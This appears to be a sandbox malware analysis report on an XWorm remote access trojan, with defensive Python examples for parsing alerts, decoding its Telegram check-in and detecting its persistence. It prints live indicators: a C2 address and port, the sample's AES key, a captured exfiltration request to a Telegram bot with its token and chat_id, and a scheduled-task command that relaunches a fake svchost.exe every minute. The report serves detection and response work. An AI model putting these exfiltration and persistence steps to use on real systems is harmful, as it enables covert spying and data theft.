2024-11-23T21:08:04.165772+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:08:06.729947+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:08:06.899211+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:08:07.064909+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:08:17.086072+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:08:27.730954+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:08:27.975903+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:08:28.746440+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:08:37.730791+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:08:42.958984+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:08:43.203569+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:08:43.325613+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:08:48.149101+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:08:53.229056+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:08:57.984436+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:08:58.231872+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:09:04.667440+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:09:06.782274+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:09:19.092806+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49732 | 104.198.168.179 | 1337 | TCP
                                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                  2024-11-23T21:05:35.078050+010028528741Malware Command and Control Activity Detected104.198.168.1791337192.168.2.449732TCP
                                  2024-11-23T21:06:05.101176+010028528741Malware Command and Control Activity Detected104.198.168.1791337192.168.2.449732TCP
                                  2024-11-23T21:06:35.112652+010028528741Malware Command and Control Activity Detected104.198.168.1791337192.168.2.449732TCP
                                  2024-11-23T21:07:05.114900+010028528741Malware Command and Control Activity Detected104.198.168.1791337192.168.2.449732TCP
                                  2024-11-23T21:07:35.152096+010028528741Malware Command and Control Activity Detected104.198.168.1791337192.168.2.449732TCP
                                  2024-11-23T21:08:05.095467+010028528741Malware Command and Control Activity Detected104.198.168.1791337192.168.2.449732TCP
                                  2024-11-23T21:08:35.150293+010028528741Malware Command and Control Activity Detected104.198.168.1791337192.168.2.449732TCP
                                  2024-11-23T21:09:05.094644+010028528741Malware Command and Control Activity Detected104.198.168.1791337192.168.2.449732TCP
                                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                  2024-11-23T21:08:03.766636+010028531931Malware Command and Control Activity Detected192.168.2.449732104.198.168.1791337TCP
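The alert rows above lost their column separators in extraction, and the two endpoint columns then admit more than one reading (for the row at 21:07:48, both 192.168.2.4 port 49732 and 192.168.2.44 port 9732 are syntactically valid). The Python below is an added example, not part of the Joe Sandbox report: it parses rows in that flattened form, enumerates every valid split, settles the ambiguity with the two hosts that the Networking section prints with explicit ':' separators, and then measures the cadence of the inbound PING command (SID 2852874). A 30-second interval with about 0.1 s of jitter is a practical fingerprint for finding the same implant in NetFlow or proxy logs. The 7-digit SID and one-digit severity widths are assumptions that hold for Emerging Threats rules; the row list is a subset of the table, copied in as test input.

```python
"""Recover the flattened Suricata alert rows above and measure the C2 beacon cadence.

Added example, not part of the Joe Sandbox report. Extraction dropped the column
separators, so the endpoint columns can be read more than one way; the parser
enumerates every valid split and keeps the one whose hosts the report confirms.
"""
import re
import statistics
from collections import namedtuple
from datetime import datetime

# Rows copied from the alert tables above (a subset, used here as test input).
FLATTENED_ROWS = [
    "2024-11-23T21:05:35.078050+010028528741Malware Command and Control Activity Detected104.198.168.1791337192.168.2.449732TCP",
    "2024-11-23T21:06:05.101176+010028528741Malware Command and Control Activity Detected104.198.168.1791337192.168.2.449732TCP",
    "2024-11-23T21:06:35.112652+010028528741Malware Command and Control Activity Detected104.198.168.1791337192.168.2.449732TCP",
    "2024-11-23T21:07:05.114900+010028528741Malware Command and Control Activity Detected104.198.168.1791337192.168.2.449732TCP",
    "2024-11-23T21:07:35.152096+010028528741Malware Command and Control Activity Detected104.198.168.1791337192.168.2.449732TCP",
    "2024-11-23T21:08:05.095467+010028528741Malware Command and Control Activity Detected104.198.168.1791337192.168.2.449732TCP",
    "2024-11-23T21:08:35.150293+010028528741Malware Command and Control Activity Detected104.198.168.1791337192.168.2.449732TCP",
    "2024-11-23T21:09:05.094644+010028528741Malware Command and Control Activity Detected104.198.168.1791337192.168.2.449732TCP",
    "2024-11-23T21:07:48.810715+010028529231Malware Command and Control Activity Detected192.168.2.449732104.198.168.1791337TCP",
    "2024-11-23T21:08:03.766636+010028531931Malware Command and Control Activity Detected192.168.2.449732104.198.168.1791337TCP",
]

# Hosts the Networking section prints unambiguously, with ':' separators.
KNOWN_HOSTS = {"192.168.2.4", "104.198.168.179"}

ROW_RE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\dT\d\d:\d\d:\d\d\.\d{6}[+-]\d{4})"
    r"(?P<sid>\d{7})(?P<sev>\d)"   # assumption: 7-digit ET rule SID, one-digit severity
    r"(?P<cls>\D+?)"               # classtype text contains no digits
    r"(?P<ends>[\d.]+)(?P<proto>TCP|UDP)$"
)
Alert = namedtuple("Alert", "ts sid severity classtype src sport dst dport proto")


def _octet(s):
    return s.isdigit() and (s == "0" or s[0] != "0") and int(s) <= 255


def _port(s):
    return s.isdigit() and s[0] != "0" and int(s) <= 65535


def split_endpoints(blob):
    """Every (src, sport, dst, dport) reading of 'A.B.C.D<port>E.F.G.H<port>'."""
    parts = blob.split(".")
    if len(parts) != 7:                      # two dotted quads give exactly six dots
        return []
    a1, a2, a3, mid, b2, b3, tail = parts    # mid = a4+sport+b1, tail = b4+dport
    out = []
    for i in range(1, len(mid)):
        for j in range(i + 1, len(mid)):
            for k in range(1, len(tail)):
                a4, sport, b1, b4, dport = mid[:i], mid[i:j], mid[j:], tail[:k], tail[k:]
                if all(_octet(o) for o in (a1, a2, a3, a4, b1, b2, b3, b4)) and _port(sport) and _port(dport):
                    out.append((f"{a1}.{a2}.{a3}.{a4}", int(sport), f"{b1}.{b2}.{b3}.{b4}", int(dport)))
    return out


def parse_row(row, known_hosts=KNOWN_HOSTS):
    """Parse one flattened row into an Alert; raise if the endpoints stay ambiguous."""
    m = ROW_RE.match(row)
    if not m:
        raise ValueError(f"unrecognised row: {row!r}")
    cands = split_endpoints(m["ends"])
    # Prefer the reading whose hosts are independently confirmed; fail loudly otherwise.
    good = [c for c in cands if c[0] in known_hosts and c[2] in known_hosts] or cands
    if len(good) != 1:
        raise ValueError(f"ambiguous endpoints {m['ends']!r}: {good}")
    src, sport, dst, dport = good[0]
    ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%S.%f%z")
    return Alert(ts, int(m["sid"]), int(m["sev"]), m["cls"], src, sport, dst, dport, m["proto"])


def beacon_intervals(alerts, sid):
    """Seconds between consecutive alerts that carry one SID."""
    times = sorted(a.ts for a in alerts if a.sid == sid)
    return [(b - a).total_seconds() for a, b in zip(times, times[1:])]


def cadence_summary(rows=FLATTENED_ROWS, sid=2852874):
    """Alert count, median gap and jitter for one SID (default: the inbound PING command)."""
    gaps = beacon_intervals([parse_row(r) for r in rows], sid)
    if not gaps:
        raise ValueError("need at least two alerts to measure a cadence")
    return {"alerts": len(gaps) + 1, "median_s": statistics.median(gaps), "jitter_s": max(gaps) - min(gaps)}


if __name__ == "__main__":
    print(cadence_summary())
```

The same split_endpoints enumeration works for any flattened IP/port/IP/port column pair; when no confirmed host list is available, parse_row raises rather than guessing, which is the behaviour you want before feeding values into a blocklist.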

                                  AV Detection

Source: WV7Gj9lJ7W.exe | Avira: detected
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Avira: detection malicious, Label: TR/Spy.Gen
Source: WV7Gj9lJ7W.exe | Malware Configuration Extractor: Xworm {"C2 url": ["127.0.0.1", "104.198.168.179"], "Port": 1337, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | ReversingLabs: Detection: 76%
Source: WV7Gj9lJ7W.exe | ReversingLabs: Detection: 76%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Joe Sandbox ML: detected
Source: WV7Gj9lJ7W.exe | Joe Sandbox ML: detected
Source: WV7Gj9lJ7W.exe | String decryptor: 127.0.0.1,104.198.168.179
Source: WV7Gj9lJ7W.exe | String decryptor: 1337
Source: WV7Gj9lJ7W.exe | String decryptor: <123456789>
Source: WV7Gj9lJ7W.exe | String decryptor: <Xwormmm>
Source: WV7Gj9lJ7W.exe | String decryptor: spoofer
Source: WV7Gj9lJ7W.exe | String decryptor: USB.exe
Source: WV7Gj9lJ7W.exe | String decryptor: %Temp%
Source: WV7Gj9lJ7W.exe | String decryptor: svchost.exe
Source: WV7Gj9lJ7W.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: WV7Gj9lJ7W.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                                  Networking

Source: Network traffic | Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49732 -> 104.198.168.179:1337
Source: Network traffic | Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 104.198.168.179:1337 -> 192.168.2.4:49732
Source: Network traffic | Suricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.4:49732 -> 104.198.168.179:1337
Source: Network traffic | Suricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 104.198.168.179:1337 -> 192.168.2.4:49732
Source: Network traffic | Suricata IDS: 2853193 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49732 -> 104.198.168.179:1337
Source: Network traffic | Suricata IDS: 2853685 - Severity 1 - ETPRO MALWARE Win32/XWorm Checkin via Telegram : 192.168.2.4:49731 -> 149.154.167.220:443
Source: Malware configuration extractor | URLs: 127.0.0.1
Source: Malware configuration extractor | URLs: 104.198.168.179
Source: unknown | DNS query: name: api.telegram.org
Source: Yara match | File source: WV7Gj9lJ7W.exe, type: SAMPLE
Source: Yara match | File source: 0.0.WV7Gj9lJ7W.exe.c00000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\svchost.exe, type: DROPPED
Source: global traffic | TCP traffic: 192.168.2.4:49732 -> 104.198.168.179:1337
Source: global traffic | HTTP traffic detected: GET /botAAFa5s6Qc5oDxqbipfR5RrOfgeTLKQlipKI/sendMessage?chat_id=7856673158&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AF723E1B88FDFE54EEC0E%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20NT2KM%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20spoofer HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 208.95.112.1
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: ip-api.com
Source: unknown | TCP traffic detected without corresponding DNS query: 104.198.168.179 (50 occurrences in the report)
Source: global traffic | DNS traffic detected: DNS query: ip-api.com
Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Sat, 23 Nov 2024 20:05:09 GMT | Content-Type: application/json | Content-Length: 55 | Connection: close | Strict-Transport-Security: max-age=31536000; includeSubDomains; preload | Access-Control-Allow-Origin: * | Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: WV7Gj9lJ7W.exe, svchost.exe.0.dr | String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: WV7Gj9lJ7W.exe, 00000000.00000002.4135621688.0000000002F51000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: WV7Gj9lJ7W.exe, svchost.exe.0.dr | String found in binary or memory: https://api.telegram.org/bot
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown | Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Window created: window name: CLIPBRDWNDCLASS
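The Telegram request above carries the victim fingerprint in the percent-encoded text parameter and the operator's bot token and chat_id in the path and query. The Python below is an added example (not code from the report or from XWorm) that decodes such a request line into structured fields and IOCs; the request line is copied from the HTTP traffic entry above, and the function and key names are chosen here. Two observations from the captured traffic are worth keeping. First, the misspellings 'New Clinet' and 'Groub' are part of the message template, so they make stable proxy-log detection strings. Second, the token as sent lacks the numeric '<bot_id>:' prefix that Telegram bot tokens carry, which fits the JSON 404 Not Found logged above (its Content-Length of 55 is exactly the length of Telegram's {"ok":false,"error_code":404,"description":"Not Found"} body), so this check-in most likely reached no operator. The separate GET to ip-api.com/line/?fields=hosting is the sample's datacenter check; ip-api answers that endpoint in plain text, which is why it appears as a bare true/false lookup rather than JSON.

```python
"""Decode the XWorm Telegram check-in captured above into fields and IOCs.

Added example, not code from the report or from XWorm. OBSERVED_REQUEST is the
request line copied from the HTTP traffic entry above; function and key names
are chosen here.
"""
import re
from urllib.parse import parse_qs, urlsplit

OBSERVED_HOST = "api.telegram.org"
OBSERVED_REQUEST = (
    "GET /botAAFa5s6Qc5oDxqbipfR5RrOfgeTLKQlipKI/sendMessage?chat_id=7856673158"
    "&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A"
    "F723E1B88FDFE54EEC0E%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20"
    "Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0A"
    "GPU%20:%20NT2KM%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20spoofer HTTP/1.1"
)

BOT_PATH_RE = re.compile(r"^/bot(?P<token>[^/]+)/(?P<method>[A-Za-z]+)$")
WELL_FORMED_TOKEN_RE = re.compile(r"^\d+:[A-Za-z0-9_-]{30,}$")   # '<bot id>:<secret>'
BANNER_RE = re.compile(r"\[XWorm (?P<version>V[\d.]+)\]")
TEMPLATE_MARKERS = ("New Clinet :", "Groub :")   # misspellings baked into the template


def decode_report(text):
    """Turn the decoded message body into {field: value}.

    Lines are 'Key : Value'; a key with an empty value (the client ID after
    'New Clinet :') takes the next non-empty line as its value.
    """
    fields, pending = {}, None
    for line in text.replace("\r\n", "\n").split("\n"):
        if not line.strip():
            continue
        if " : " in line:
            key, _, value = line.partition(" : ")
            fields[key.strip()] = value.strip()
            pending = key.strip() if not value.strip() else None
        elif pending:
            fields[pending] = line.strip()
            pending = None
    return fields


def parse_telegram_checkin(request_line, host=OBSERVED_HOST):
    """Extract bot token, chat_id, XWorm version and victim fields from a request line."""
    method, target, _version = request_line.split(" ", 2)
    url = urlsplit(target)
    m = BOT_PATH_RE.match(url.path)
    if method != "GET" or host != "api.telegram.org" or not m:
        raise ValueError("not a Telegram Bot API request")
    query = parse_qs(url.query)                 # percent-decodes the values
    text = query.get("text", [""])[0]
    banner, _, body = text.replace("\r\n", "\n").partition("\n")
    version = BANNER_RE.search(banner)
    return {
        "bot_token": m["token"],
        "token_well_formed": bool(WELL_FORMED_TOKEN_RE.match(m["token"])),
        "api_method": m["method"],
        "chat_id": query.get("chat_id", [None])[0],
        "version": version["version"] if version else None,
        "fields": decode_report(body),
        "template_hit": any(marker in text for marker in TEMPLATE_MARKERS),
    }


if __name__ == "__main__":
    for k, v in parse_telegram_checkin(OBSERVED_REQUEST).items():
        print(f"{k}: {v}")
```

Run over a proxy log, token_well_formed separates beacons that can actually reach an operator from misbuilt ones, and template_hit is the cheap first-pass filter; the decoded fields (client ID, group tag, OS string) are what you pivot on across hosts.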

                                  Operating System Destruction

Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Process information set: 01 00 00 00 (ProcessBreakOnTermination = 1: the process is marked critical, so terminating it triggers a CRITICAL_PROCESS_DIED bugcheck; during response, clear the flag or suspend the process rather than killing it)

                                  System Summary

Source: WV7Gj9lJ7W.exe, type: SAMPLE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.0.WV7Gj9lJ7W.exe.c00000.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.4139603670.0000000012F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000000.1688626641.0000000000C02000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\svchost.exe, type: DROPPED | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Code function: 0_2_00007FFD9B8B1779
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Code function: 0_2_00007FFD9B8B6FD2
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Code function: 0_2_00007FFD9B8B6226
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Code function: 0_2_00007FFD9B8B24F1
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Code function: 0_2_00007FFD9B8BFD04
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Code function: 0_2_00007FFD9B8B2259
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 3_2_00007FFD9B881779
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 3_2_00007FFD9B8810FA
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 3_2_00007FFD9B882259
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 5_2_00007FFD9B8A1779
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 5_2_00007FFD9B8A10FA
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 5_2_00007FFD9B8A2259
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 8_2_00007FFD9B8B1779
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 8_2_00007FFD9B8B10FA
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 8_2_00007FFD9B8B2259
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 9_2_00007FFD9B8A1779
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 9_2_00007FFD9B8A10FA
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 9_2_00007FFD9B8A2259
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 11_2_00007FFD9B891779
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 11_2_00007FFD9B8910FA
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 11_2_00007FFD9B892259
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 13_2_00007FFD9B8B1779
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 13_2_00007FFD9B8B10FA
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 13_2_00007FFD9B8B2259
Source: WV7Gj9lJ7W.exe, 00000000.00000002.4139603670.0000000012F51000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamemapper.exe4 vs WV7Gj9lJ7W.exe
Source: WV7Gj9lJ7W.exe, 00000000.00000000.1688650706.0000000000C18000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamemapper.exe4 vs WV7Gj9lJ7W.exe
Source: WV7Gj9lJ7W.exe | Binary or memory string: OriginalFilenamemapper.exe4 vs WV7Gj9lJ7W.exe
Source: WV7Gj9lJ7W.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: WV7Gj9lJ7W.exe, type: SAMPLE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.0.WV7Gj9lJ7W.exe.c00000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.4139603670.0000000012F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000000.1688626641.0000000000C02000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Local\Temp\svchost.exe, type: DROPPED | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: WV7Gj9lJ7W.exe, CAwAkHv2L9O24ZkL3o8yl2OMHnLL8juDUedYdDoMnoeapLDAWUrvcizzw9fV8raypt27ZJiYHXrCK.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: WV7Gj9lJ7W.exe, GiAmC40B13JgmF6UXFFKMPWATVLvv65v727AW1ocLFYsRDQPyyTbwRDgqgPrBPqfKlg14hVgQR56p.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: WV7Gj9lJ7W.exe, GiAmC40B13JgmF6UXFFKMPWATVLvv65v727AW1ocLFYsRDQPyyTbwRDgqgPrBPqfKlg14hVgQR56p.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: svchost.exe.0.dr, CAwAkHv2L9O24ZkL3o8yl2OMHnLL8juDUedYdDoMnoeapLDAWUrvcizzw9fV8raypt27ZJiYHXrCK.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: svchost.exe.0.dr, GiAmC40B13JgmF6UXFFKMPWATVLvv65v727AW1ocLFYsRDQPyyTbwRDgqgPrBPqfKlg14hVgQR56p.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: svchost.exe.0.dr, GiAmC40B13JgmF6UXFFKMPWATVLvv65v727AW1ocLFYsRDQPyyTbwRDgqgPrBPqfKlg14hVgQR56p.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: svchost.exe.0.dr, OtdwFnwcQUOqdXCzEXT2iHWY6m7TnezmZ9KWNrTeti2sF.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: svchost.exe.0.dr, OtdwFnwcQUOqdXCzEXT2iHWY6m7TnezmZ9KWNrTeti2sF.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: WV7Gj9lJ7W.exe, OtdwFnwcQUOqdXCzEXT2iHWY6m7TnezmZ9KWNrTeti2sF.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: WV7Gj9lJ7W.exe, OtdwFnwcQUOqdXCzEXT2iHWY6m7TnezmZ9KWNrTeti2sF.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine | Classification label: mal100.troj.evad.winEXE@11/4@2/3
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Mutant created: NULL
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Mutant created: \Sessions\1\BaseNamedObjects\8zjo0ekcgEIZQvCP
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6252:120:WilError_03
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | File created: C:\Users\user\AppData\Local\Temp\svchost.exe
Source: WV7Gj9lJ7W.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: WV7Gj9lJ7W.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: WV7Gj9lJ7W.exe | ReversingLabs: Detection: 76%
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | File read: C:\Users\user\Desktop\WV7Gj9lJ7W.exe
Source: unknown | Process created: C:\Users\user\Desktop\WV7Gj9lJ7W.exe "C:\Users\user\Desktop\WV7Gj9lJ7W.exe"
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Local\Temp\svchost.exe"
Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\svchost.exe C:\Users\user\AppData\Local\Temp\svchost.exe
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\svchost.exe "C:\Users\user\AppData\Local\Temp\svchost.exe"
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\svchost.exe "C:\Users\user\AppData\Local\Temp\svchost.exe"
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\svchost.exe C:\Users\user\AppData\Local\Temp\svchost.exe
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\svchost.exe C:\Users\user\AppData\Local\Temp\svchost.exe
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\svchost.exe C:\Users\user\AppData\Local\Temp\svchost.exe
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\svchost.exe C:\Users\user\AppData\Local\Temp\svchost.exe
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Local\Temp\svchost.exe"
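The process tree above shows the two persistence mechanisms the sample uses: a scheduled task named svchost that relaunches C:\Users\user\AppData\Local\Temp\svchost.exe every minute at the highest run level, and the Startup-folder shortcut svchost.lnk listed earlier in this section. The Python below is an added example, not part of the report, that turns the observations behind the report's Sigma hits into checks over process-creation events: a schtasks /create whose action lives in a user-writable directory, carries a system-process name, or re-fires every minute, and any svchost.exe-style name executing outside System32/SysWOW64. The events are constructed from the command lines above plus one benign svchost launch for contrast; image and cmdline are assumed field names for whatever process-creation log you have.

```python
"""Checks for the persistence seen in the process tree above.

Added example, not part of the report. EVENTS is constructed from the command
lines in the report plus one benign svchost launch for contrast; 'image' and
'cmdline' are assumed field names for a process-creation log.
"""
import shlex
from pathlib import PureWindowsPath

SYSTEM_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}
# Names that legitimately live only in the system directories.
SYSTEM_NAMES = {"svchost.exe", "lsass.exe", "csrss.exe", "winlogon.exe",
                "services.exe", "wininit.exe", "smss.exe"}
USER_WRITABLE = (r"\appdata\local\temp", r"\appdata\roaming", r"\appdata\local",
                 r"\users\public", r"\programdata")

EVENTS = [
    {"image": r"C:\Users\user\Desktop\WV7Gj9lJ7W.exe",
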